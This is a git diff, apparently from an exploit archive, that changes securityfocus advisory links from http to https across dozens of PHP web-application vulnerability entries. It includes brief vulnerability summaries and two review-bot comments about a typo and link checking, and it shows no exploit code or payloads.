45d50f5f7..b3bb2f1d2 100644 --- a/exploits/php/webapps/30321.txt +++ b/exploits/php/webapps/30321.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24966/info +source: https://www.securityfocus.com/bid/24966/info geoBlog is prone to multiple security-bypass vulnerabilities because the application fails to properly validate users when deleting user blogs and comments. diff --git a/exploits/php/webapps/30323.txt b/exploits/php/webapps/30323.txt index a908f4e02..d8a87ba06 100644 --- a/exploits/php/webapps/30323.txt +++ b/exploits/php/webapps/30323.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24990/info +source: https://www.securityfocus.com/bid/24990/info UseBB is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30324.txt b/exploits/php/webapps/30324.txt index eb98c0281..ef83f4d0e 100644 --- a/exploits/php/webapps/30324.txt +++ b/exploits/php/webapps/30324.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24990/info +source: https://www.securityfocus.com/bid/24990/info UseBB is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30333.txt b/exploits/php/webapps/30333.txt index 93ebb14ff..c40364a87 100644 --- a/exploits/php/webapps/30333.txt +++ b/exploits/php/webapps/30333.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25011/info +source: https://www.securityfocus.com/bid/25011/info PHMe is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30366.txt b/exploits/php/webapps/30366.txt index 88c26dcf7..010f51e36 100644 --- a/exploits/php/webapps/30366.txt +++ b/exploits/php/webapps/30366.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25019/info +source: https://www.securityfocus.com/bid/25019/info AlstraSoft Video Share Enterprise is affected by multiple input-validation vulnerabilities. These issues include multiple cross-site scripting vulnerabilities and multiple SQL-injection vulnerabilities. diff --git a/exploits/php/webapps/30367.txt b/exploits/php/webapps/30367.txt index 5ac193ba7..2702ace69 100644 --- a/exploits/php/webapps/30367.txt +++ b/exploits/php/webapps/30367.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25022/info +source: https://www.securityfocus.com/bid/25022/info SMS Text Messaging Enterprise is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30368.txt b/exploits/php/webapps/30368.txt index a15e3eb39..b74541e3a 100644 --- a/exploits/php/webapps/30368.txt +++ b/exploits/php/webapps/30368.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25022/info +source: https://www.securityfocus.com/bid/25022/info SMS Text Messaging Enterprise is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30369.txt b/exploits/php/webapps/30369.txt index 9de8b8b5c..d59027cee 100644 --- a/exploits/php/webapps/30369.txt +++ b/exploits/php/webapps/30369.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25026/info +source: https://www.securityfocus.com/bid/25026/info AlstraSoft Affiliate Network Pro is affected by multiple input-validation vulnerabilities. These issues include multiple cross-site scripting isues and SQL-injection issues. diff --git a/exploits/php/webapps/30370.txt b/exploits/php/webapps/30370.txt index 4110521b2..f696960b6 100644 --- a/exploits/php/webapps/30370.txt +++ b/exploits/php/webapps/30370.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25026/info +source: https://www.securityfocus.com/bid/25026/info AlstraSoft Affiliate Network Pro is affected by multiple input-validation vulnerabilities. These issues include multiple cross-site scripting isues and SQL-injection issues. diff --git a/exploits/php/webapps/30371.txt b/exploits/php/webapps/30371.txt index 1812e8bd0..6cb2a2885 100644 --- a/exploits/php/webapps/30371.txt +++ b/exploits/php/webapps/30371.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25026/info +source: https://www.securityfocus.com/bid/25026/info AlstraSoft Affiliate Network Pro is affected by multiple input-validation vulnerabilities. These issues include multiple cross-site scripting isues and SQL-injection issues. diff --git a/exploits/php/webapps/30378.txt b/exploits/php/webapps/30378.txt index 9e3abf4f5..39132cc83 100644 --- a/exploits/php/webapps/30378.txt +++ b/exploits/php/webapps/30378.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25040/info +source: https://www.securityfocus.com/bid/25040/info The 'webbler' is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30379.html b/exploits/php/webapps/30379.html index 2cba36d2a..56952bac8 100644 --- a/exploits/php/webapps/30379.html +++ b/exploits/php/webapps/30379.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25045/info +source: https://www.securityfocus.com/bid/25045/info The 'webbler' is prone to an open-email-relay vulnerability. diff --git a/exploits/php/webapps/30380.txt b/exploits/php/webapps/30380.txt index 75a86b61e..cf8316da6 100644 --- a/exploits/php/webapps/30380.txt +++ b/exploits/php/webapps/30380.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25047/info +source: https://www.securityfocus.com/bid/25047/info cPanel is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30383.txt b/exploits/php/webapps/30383.txt index 2ebf46de5..5bce187d9 100644 --- a/exploits/php/webapps/30383.txt +++ b/exploits/php/webapps/30383.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25056/info +source: https://www.securityfocus.com/bid/25056/info Vikingboard is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. 
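Review bot: The unchanged context line in the 30369.txt, 30370.txt and 30371.txt hunks still reads "multiple cross-site scripting isues and SQL-injection issues". These files are already being touched on line 1, so correct "isues" to "issues" in this pass or a follow-up; as it stands, a text search for "cross-site scripting issues" misses all three AlstraSoft Affiliate Network Pro entries.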
diff --git a/exploits/php/webapps/30384.txt b/exploits/php/webapps/30384.txt index 068a046fc..fa3e527e8 100644 --- a/exploits/php/webapps/30384.txt +++ b/exploits/php/webapps/30384.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25056/info +source: https://www.securityfocus.com/bid/25056/info Vikingboard is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30385.txt b/exploits/php/webapps/30385.txt index c2e051b2e..574876812 100644 --- a/exploits/php/webapps/30385.txt +++ b/exploits/php/webapps/30385.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25056/info +source: https://www.securityfocus.com/bid/25056/info Vikingboard is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30386.txt b/exploits/php/webapps/30386.txt index 3ea75ff16..f772ff204 100644 --- a/exploits/php/webapps/30386.txt +++ b/exploits/php/webapps/30386.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25056/info +source: https://www.securityfocus.com/bid/25056/info Vikingboard is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30387.txt b/exploits/php/webapps/30387.txt index 39eedf2db..326deafc2 100644 --- a/exploits/php/webapps/30387.txt +++ b/exploits/php/webapps/30387.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25060/info +source: https://www.securityfocus.com/bid/25060/info Vikingboard is prone to multiple information-disclosure weaknesses because attackers may disclose sensitive information that may be used in other attacks on the system. diff --git a/exploits/php/webapps/30388.txt b/exploits/php/webapps/30388.txt index a26c69e40..93304d138 100644 --- a/exploits/php/webapps/30388.txt +++ b/exploits/php/webapps/30388.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25060/info +source: https://www.securityfocus.com/bid/25060/info Vikingboard is prone to multiple information-disclosure weaknesses because attackers may disclose sensitive information that may be used in other attacks on the system. diff --git a/exploits/php/webapps/30389.txt b/exploits/php/webapps/30389.txt index 55519596e..3281723da 100644 --- a/exploits/php/webapps/30389.txt +++ b/exploits/php/webapps/30389.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25065/info +source: https://www.securityfocus.com/bid/25065/info iFoto is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30390.txt b/exploits/php/webapps/30390.txt index 066857e24..5b4d32384 100644 --- a/exploits/php/webapps/30390.txt +++ b/exploits/php/webapps/30390.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25072/info +source: https://www.securityfocus.com/bid/25072/info BSM Store Dependent Forums is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/30391.txt b/exploits/php/webapps/30391.txt index b285f3031..ef6dd67ae 100644 --- a/exploits/php/webapps/30391.txt +++ b/exploits/php/webapps/30391.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25073/info +source: https://www.securityfocus.com/bid/25073/info PhpHostBot is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30403.txt b/exploits/php/webapps/30403.txt index 73f2d8b87..ca46b08af 100644 --- a/exploits/php/webapps/30403.txt +++ b/exploits/php/webapps/30403.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25085/info +source: https://www.securityfocus.com/bid/25085/info The WP-FeedStats plugin for WordPress is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/30405.txt b/exploits/php/webapps/30405.txt index b32f5052a..ea3b78066 100644 --- a/exploits/php/webapps/30405.txt +++ b/exploits/php/webapps/30405.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25094/info +source: https://www.securityfocus.com/bid/25094/info Bandersnatch is prone to multiple input-validation vulnerabilities because the application fails to sanitize user-supplied input. These issues include multiple SQL-injections vulnerabilities and an HTML-injection vulnerability. diff --git a/exploits/php/webapps/30429.txt b/exploits/php/webapps/30429.txt index 303c08bcd..b6e2e9b27 100644 --- a/exploits/php/webapps/30429.txt +++ b/exploits/php/webapps/30429.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25116/info +source: https://www.securityfocus.com/bid/25116/info phpCoupon is prone to a remote payment-bypass vulnerability because the application fails to properly secure PayPal payment transactions. diff --git a/exploits/php/webapps/30433.txt b/exploits/php/webapps/30433.txt index 35a72669c..3376f9f6a 100644 --- a/exploits/php/webapps/30433.txt +++ b/exploits/php/webapps/30433.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25129/info +source: https://www.securityfocus.com/bid/25129/info IT!CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/30434.txt b/exploits/php/webapps/30434.txt index 3fd988c09..8c642b17e 100644 --- a/exploits/php/webapps/30434.txt +++ b/exploits/php/webapps/30434.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25129/info +source: https://www.securityfocus.com/bid/25129/info IT!CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/30435.txt b/exploits/php/webapps/30435.txt index 8a6ec3d47..a4411e980 100644 --- a/exploits/php/webapps/30435.txt +++ b/exploits/php/webapps/30435.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25129/info +source: https://www.securityfocus.com/bid/25129/info IT!CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/30436.txt b/exploits/php/webapps/30436.txt index d9d0a9f46..351988701 100644 --- a/exploits/php/webapps/30436.txt +++ b/exploits/php/webapps/30436.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25138/info +source: https://www.securityfocus.com/bid/25138/info Aplomb Poll is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30437.txt b/exploits/php/webapps/30437.txt index cd688023a..f28220555 100644 --- a/exploits/php/webapps/30437.txt +++ b/exploits/php/webapps/30437.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25138/info +source: https://www.securityfocus.com/bid/25138/info Aplomb Poll is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30438.txt b/exploits/php/webapps/30438.txt index d7a17b48c..c85b60f0c 100644 --- a/exploits/php/webapps/30438.txt +++ b/exploits/php/webapps/30438.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25138/info +source: https://www.securityfocus.com/bid/25138/info Aplomb Poll is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30442.txt b/exploits/php/webapps/30442.txt index 41b6f8ded..c19355565 100644 --- a/exploits/php/webapps/30442.txt +++ b/exploits/php/webapps/30442.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25166/info +source: https://www.securityfocus.com/bid/25166/info WebDirector is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30445.txt b/exploits/php/webapps/30445.txt index 332578393..cc6ee396b 100644 --- a/exploits/php/webapps/30445.txt +++ b/exploits/php/webapps/30445.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25183/info +source: https://www.securityfocus.com/bid/25183/info Tour de France Pool for Joomla is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30448.txt b/exploits/php/webapps/30448.txt index 453511504..f9bb14941 100644 --- a/exploits/php/webapps/30448.txt +++ b/exploits/php/webapps/30448.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25193/info +source: https://www.securityfocus.com/bid/25193/info LANAI CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/30449.txt b/exploits/php/webapps/30449.txt index 96c1e2543..3a4515850 100644 --- a/exploits/php/webapps/30449.txt +++ b/exploits/php/webapps/30449.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25193/info +source: https://www.securityfocus.com/bid/25193/info LANAI CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/30450.txt b/exploits/php/webapps/30450.txt index 902c90e28..8c9c36e08 100644 --- a/exploits/php/webapps/30450.txt +++ b/exploits/php/webapps/30450.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25193/info +source: https://www.securityfocus.com/bid/25193/info LANAI CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/30452.txt b/exploits/php/webapps/30452.txt index 62189c217..78cafd0f5 100644 --- a/exploits/php/webapps/30452.txt +++ b/exploits/php/webapps/30452.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25198/info +source: https://www.securityfocus.com/bid/25198/info J! Reactions is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30453.txt b/exploits/php/webapps/30453.txt index 46cb43cf7..4658a6677 100644 --- a/exploits/php/webapps/30453.txt +++ b/exploits/php/webapps/30453.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25212/info +source: https://www.securityfocus.com/bid/25212/info The 'snif' program is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30456.txt b/exploits/php/webapps/30456.txt index 1c7e44bf1..1e9454538 100644 --- a/exploits/php/webapps/30456.txt +++ b/exploits/php/webapps/30456.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25226/info +source: https://www.securityfocus.com/bid/25226/info VietPHP is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30457.txt b/exploits/php/webapps/30457.txt index 5ae875022..8c87377bf 100644 --- a/exploits/php/webapps/30457.txt +++ b/exploits/php/webapps/30457.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25226/info +source: https://www.securityfocus.com/bid/25226/info VietPHP is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30459.txt b/exploits/php/webapps/30459.txt index 1d271392e..0cff1805c 100644 --- a/exploits/php/webapps/30459.txt +++ b/exploits/php/webapps/30459.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25226/info +source: https://www.securityfocus.com/bid/25226/info VietPHP is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30463.txt b/exploits/php/webapps/30463.txt index 74a2b67b8..2a0843508 100644 --- a/exploits/php/webapps/30463.txt +++ b/exploits/php/webapps/30463.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25243/info +source: https://www.securityfocus.com/bid/25243/info Coppermine Photo Gallery is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30465.txt b/exploits/php/webapps/30465.txt index 51299dbe0..652502f36 100644 --- a/exploits/php/webapps/30465.txt +++ b/exploits/php/webapps/30465.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25252/info +source: https://www.securityfocus.com/bid/25252/info Mapos-Scripts.de Gastebuch is prone to a remote file-include vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30466.txt b/exploits/php/webapps/30466.txt index 58de6634f..60298b6f2 100644 --- a/exploits/php/webapps/30466.txt +++ b/exploits/php/webapps/30466.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25253/info +source: https://www.securityfocus.com/bid/25253/info File Uploader is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30467.txt b/exploits/php/webapps/30467.txt index 254f42f0f..3900de2d0 100644 --- a/exploits/php/webapps/30467.txt +++ b/exploits/php/webapps/30467.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25253/info +source: https://www.securityfocus.com/bid/25253/info File Uploader is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30479.txt b/exploits/php/webapps/30479.txt index f976bfa18..233e2789a 100644 --- a/exploits/php/webapps/30479.txt +++ b/exploits/php/webapps/30479.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25254/info +source: https://www.securityfocus.com/bid/25254/info Shoutbox is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30480.txt b/exploits/php/webapps/30480.txt index b64b561e0..2840c0dd4 100644 --- a/exploits/php/webapps/30480.txt +++ b/exploits/php/webapps/30480.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25256/info +source: https://www.securityfocus.com/bid/25256/info Bilder Galerie is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30481.txt b/exploits/php/webapps/30481.txt index e2afb8288..149826df2 100644 --- a/exploits/php/webapps/30481.txt +++ b/exploits/php/webapps/30481.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25257/info +source: https://www.securityfocus.com/bid/25257/info WebNews is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30482.txt b/exploits/php/webapps/30482.txt index 30d03fe22..468e2b5a1 100644 --- a/exploits/php/webapps/30482.txt +++ b/exploits/php/webapps/30482.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25257/info +source: https://www.securityfocus.com/bid/25257/info WebNews is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30483.txt b/exploits/php/webapps/30483.txt index b3357b313..f15483db1 100644 --- a/exploits/php/webapps/30483.txt +++ b/exploits/php/webapps/30483.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25257/info +source: https://www.securityfocus.com/bid/25257/info WebNews is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30486.txt b/exploits/php/webapps/30486.txt index c6f758f00..829fedfba 100644 --- a/exploits/php/webapps/30486.txt +++ b/exploits/php/webapps/30486.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25274/info +source: https://www.securityfocus.com/bid/25274/info Lib2 PHP Library is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. 
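Review bot: Nothing in these hunks shows that the rewritten https://www.securityfocus.com/bid/<id>/info links were checked to resolve. Line 1 of each file changes only in its scheme while the index hash changes for every file, so this is a bulk rewrite. A link check over the new `source:` values, or a sentence in the commit message stating that the host serves the same paths over TLS, would confirm that each entry still points at the advisory it cites.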
diff --git a/exploits/php/webapps/30487.txt b/exploits/php/webapps/30487.txt index d76e454f2..00ade6792 100644 --- a/exploits/php/webapps/30487.txt +++ b/exploits/php/webapps/30487.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25275/info +source: https://www.securityfocus.com/bid/25275/info Php-Stats is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30488.php b/exploits/php/webapps/30488.php index 3eeeaba11..ff60e344d 100644 --- a/exploits/php/webapps/30488.php +++ b/exploits/php/webapps/30488.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25276/info +source: https://www.securityfocus.com/bid/25276/info Haudenschilt Family Connections is prone to an authentication-bypass vulnerability. diff --git a/exploits/php/webapps/30489.txt b/exploits/php/webapps/30489.txt index efa66a71e..45c043539 100644 --- a/exploits/php/webapps/30489.txt +++ b/exploits/php/webapps/30489.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25277/info +source: https://www.securityfocus.com/bid/25277/info Openads (formerly known as phpAdsNew) is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30492.txt b/exploits/php/webapps/30492.txt index b3542a2eb..dea5f4c61 100644 --- a/exploits/php/webapps/30492.txt +++ b/exploits/php/webapps/30492.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25296/info +source: https://www.securityfocus.com/bid/25296/info JobLister3 is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/30501.txt b/exploits/php/webapps/30501.txt index 38c967872..056792d04 100644 --- a/exploits/php/webapps/30501.txt +++ b/exploits/php/webapps/30501.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25335/info +source: https://www.securityfocus.com/bid/25335/info 'Systeme de vote pour site Web' is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30504.txt b/exploits/php/webapps/30504.txt index 62bb13f49..bc1666880 100644 --- a/exploits/php/webapps/30504.txt +++ b/exploits/php/webapps/30504.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25343/info +source: https://www.securityfocus.com/bid/25343/info Olate Download is prone to an authentication-bypass vulnerability. diff --git a/exploits/php/webapps/30509.txt b/exploits/php/webapps/30509.txt index f589ed619..316d30c2c 100644 --- a/exploits/php/webapps/30509.txt +++ b/exploits/php/webapps/30509.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25361/info +source: https://www.securityfocus.com/bid/25361/info Dalai Forum is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30510.txt b/exploits/php/webapps/30510.txt index de8f3d300..9aa773f95 100644 --- a/exploits/php/webapps/30510.txt +++ b/exploits/php/webapps/30510.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25366/info +source: https://www.securityfocus.com/bid/25366/info Firesoft is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30511.txt b/exploits/php/webapps/30511.txt index 55d8ce7a3..52cc4496a 100644 --- a/exploits/php/webapps/30511.txt +++ b/exploits/php/webapps/30511.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25368/info +source: https://www.securityfocus.com/bid/25368/info Gurur Haber is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. 
diff --git a/exploits/php/webapps/30515.txt b/exploits/php/webapps/30515.txt index d7b991035..7292a3863 100644 --- a/exploits/php/webapps/30515.txt +++ b/exploits/php/webapps/30515.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25393/info +source: https://www.securityfocus.com/bid/25393/info coWiki is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30516.txt b/exploits/php/webapps/30516.txt index aaba99919..c1e0d02bd 100644 --- a/exploits/php/webapps/30516.txt +++ b/exploits/php/webapps/30516.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25394/info +source: https://www.securityfocus.com/bid/25394/info m-phorum is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30518.txt b/exploits/php/webapps/30518.txt index 872ecb398..750adb786 100644 --- a/exploits/php/webapps/30518.txt +++ b/exploits/php/webapps/30518.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25406/info +source: https://www.securityfocus.com/bid/25406/info Ripe Website Manager is prone to multiple input-validation vulnerabilities, including HTML- and SQL-injection issues. diff --git a/exploits/php/webapps/30520.txt b/exploits/php/webapps/30520.txt index 1ecc79574..71d214ad8 100644 --- a/exploits/php/webapps/30520.txt +++ b/exploits/php/webapps/30520.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25413/info +source: https://www.securityfocus.com/bid/25413/info WordPress Pool is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30525.txt b/exploits/php/webapps/30525.txt index 1eee65923..5d0e89c92 100644 --- a/exploits/php/webapps/30525.txt +++ b/exploits/php/webapps/30525.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25432/info +source: https://www.securityfocus.com/bid/25432/info Arcadem is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30531.txt b/exploits/php/webapps/30531.txt index 3c648a71e..3db875196 100644 --- a/exploits/php/webapps/30531.txt +++ b/exploits/php/webapps/30531.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25448/info +source: https://www.securityfocus.com/bid/25448/info AutoIndex PHP Script is prone a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/30533.txt b/exploits/php/webapps/30533.txt index 45df26287..0cf255dda 100644 --- a/exploits/php/webapps/30533.txt +++ b/exploits/php/webapps/30533.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25456/info +source: https://www.securityfocus.com/bid/25456/info Calendar Events is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/30534.txt b/exploits/php/webapps/30534.txt index 1df79cfa1..71d1f7bab 100644 --- a/exploits/php/webapps/30534.txt +++ b/exploits/php/webapps/30534.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25458/info +source: https://www.securityfocus.com/bid/25458/info PhpGedView is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30539.txt b/exploits/php/webapps/30539.txt index 39a56b6c7..df4a92158 100644 --- a/exploits/php/webapps/30539.txt +++ b/exploits/php/webapps/30539.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25466/info +source: https://www.securityfocus.com/bid/25466/info ACG News is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in SQL queries. diff --git a/exploits/php/webapps/30553.txt b/exploits/php/webapps/30553.txt index 1e7af6c9f..649261c06 100644 --- a/exploits/php/webapps/30553.txt +++ b/exploits/php/webapps/30553.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25507/info +source: https://www.securityfocus.com/bid/25507/info Toms Gästebuch is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30554.txt b/exploits/php/webapps/30554.txt index 7b07dc022..74b5f0cf7 100644 --- a/exploits/php/webapps/30554.txt +++ b/exploits/php/webapps/30554.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25507/info +source: https://www.securityfocus.com/bid/25507/info Toms Gästebuch is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30555.txt b/exploits/php/webapps/30555.txt index 1d7c54613..c016dad40 100644 --- a/exploits/php/webapps/30555.txt +++ b/exploits/php/webapps/30555.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25515/info +source: https://www.securityfocus.com/bid/25515/info MKPortal is prone to an authentication-bypass vulnerability because it fails to restrict access to certain administrative functions. diff --git a/exploits/php/webapps/30556.html b/exploits/php/webapps/30556.html index e447918d7..cca3b1315 100644 --- a/exploits/php/webapps/30556.html +++ b/exploits/php/webapps/30556.html 
